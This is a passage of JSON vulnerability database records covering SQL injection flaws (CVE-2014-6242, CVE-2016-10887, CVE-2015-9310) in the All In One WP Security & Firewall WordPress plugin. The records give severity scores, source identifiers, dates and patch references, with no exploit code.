            "date": "2014-10-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-74185"
          },
          {
            "date": "2014-09-24T00:00:00",
            "db": "BID",
            "id": "70150"
          },
          {
            "date": "2014-10-24T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          },
          {
            "date": "2014-09-25T15:32:27",
            "db": "PACKETSTORM",
            "id": "128419"
          },
          {
            "date": "2014-10-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201410-046"
          },
          {
            "date": "2014-10-02T14:55:04.823000",
            "db": "NVD",
            "id": "CVE-2014-6242"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-74185"
          },
          {
            "date": "2014-09-24T00:00:00",
            "db": "BID",
            "id": "70150"
          },
          {
            "date": "2014-10-24T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          },
          {
            "date": "2014-10-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201410-046"
          },
          {
            "date": "2025-04-12T10:46:40.837000",
            "db": "NVD",
            "id": "CVE-2014-6242"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "128419"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-046"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "WordPress for  All In One WP Security \u0026 Firewall In the plugin  SQL Injection vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-004988"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "sql injection",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "128419"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201410-046"
          }
        ],
        "trust": 0.7
      }
    }

    VAR-201908-1072

    Vulnerability from variot - Updated: 2024-11-23 23:08

    The all-in-one-wp-security-and-firewall plugin before 4.0.9 for WordPress has multiple SQL injection issues. The all-in-one-wp-security-and-firewall plugin for WordPress contains an SQL injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). The vulnerability stems from the lack of verification of externally input SQL statements in database-based applications. Attackers can exploit this vulnerability to execute illegal SQL commands.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201908-1072",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wp security \\\u0026 firewall",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "tipsandtricks hq",
            "version": "4.0.9"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "4.0.9"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10887"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          }
        ]
      },
      "cve": "CVE-2016-10887",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2016-10887",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-89708",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2016-10887",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2016-10887",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2016-10887",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201908-1056",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-89708",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89708"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1056"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10887"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The all-in-one-wp-security-and-firewall plugin before 4.0.9 for WordPress has multiple SQL injection issues. WordPress for all-in-one-wp-security-and-firewall Plug-ins include SQL An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The vulnerability stems from the lack of verification of externally input SQL statements in database-based applications. Attackers can exploit this vulnerability to execute illegal SQL commands",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2016-10887"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          },
          {
            "db": "VULHUB",
            "id": "VHN-89708"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2016-10887",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007795",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1056",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-89708",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89708"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1056"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10887"
          }
        ]
      },
      "id": "VAR-201908-1072",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89708"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-11-23T23:08:17.015000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All In One WP Security \u0026 Firewall",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "title": "WordPress all-in-one-wp-security-and-firewall Plugin SQL Repair measures for injecting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=96733"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1056"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89708"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10887"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10887"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10887"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89708"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1056"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10887"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-89708"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1056"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10887"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-14T00:00:00",
            "db": "VULHUB",
            "id": "VHN-89708"
          },
          {
            "date": "2019-08-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          },
          {
            "date": "2019-08-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-1056"
          },
          {
            "date": "2019-08-14T16:15:11.957000",
            "db": "NVD",
            "id": "CVE-2016-10887"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-19T00:00:00",
            "db": "VULHUB",
            "id": "VHN-89708"
          },
          {
            "date": "2019-08-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          },
          {
            "date": "2019-08-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-1056"
          },
          {
            "date": "2024-11-21T02:44:59.587000",
            "db": "NVD",
            "id": "CVE-2016-10887"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1056"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection vulnerability in the all-in-one-wp-security-and-firewall plugin for WordPress",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007795"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1056"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201908-1219

    Vulnerability from variot - Updated: 2024-11-23 23:08

    The all-in-one-wp-security-and-firewall plugin before 3.9.1 for WordPress has multiple SQL injection issues. The all-in-one-wp-security-and-firewall plugin for WordPress contains an SQL injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). The vulnerability stems from a lack of validation of externally supplied SQL statements in database-backed applications. Attackers can exploit this vulnerability to execute unauthorized SQL commands.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201908-1219",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wp security \\\u0026 firewall",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "tipsandtricks hq",
            "version": "3.9.1"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "3.9.1"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9310"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          }
        ]
      },
      "cve": "CVE-2015-9310",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2015-9310",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-87271",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2015-9310",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2015-9310",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2015-9310",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201908-1047",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-87271",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87271"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1047"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9310"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The all-in-one-wp-security-and-firewall plugin before 3.9.1 for WordPress has multiple SQL injection issues. The all-in-one-wp-security-and-firewall plugin for WordPress contains an SQL injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). The vulnerability stems from a lack of validation of externally supplied SQL statements in database-backed applications. Attackers can exploit this vulnerability to execute unauthorized SQL commands.",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2015-9310"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          },
          {
            "db": "VULHUB",
            "id": "VHN-87271"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2015-9310",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007800",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1047",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-87271",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87271"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1047"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9310"
          }
        ]
      },
      "id": "VAR-201908-1219",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87271"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-11-23T23:08:16.883000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All In One WP Security \u0026 Firewall",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "title": "WordPress all-in-one-wp-security-and-firewall Plugin SQL Repair measures for injecting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=96724"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1047"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87271"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9310"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-9310"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-9310"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-87271"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1047"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9310"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-87271"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1047"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-9310"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-14T00:00:00",
            "db": "VULHUB",
            "id": "VHN-87271"
          },
          {
            "date": "2019-08-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          },
          {
            "date": "2019-08-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-1047"
          },
          {
            "date": "2019-08-14T16:15:11.377000",
            "db": "NVD",
            "id": "CVE-2015-9310"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-19T00:00:00",
            "db": "VULHUB",
            "id": "VHN-87271"
          },
          {
            "date": "2019-08-21T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          },
          {
            "date": "2019-08-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-1047"
          },
          {
            "date": "2024-11-21T02:40:18.830000",
            "db": "NVD",
            "id": "CVE-2015-9310"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-1047"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection vulnerability in the all-in-one-wp-security-and-firewall plugin for WordPress",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007800"
          }
        ],
        "trust": 0.8
      },
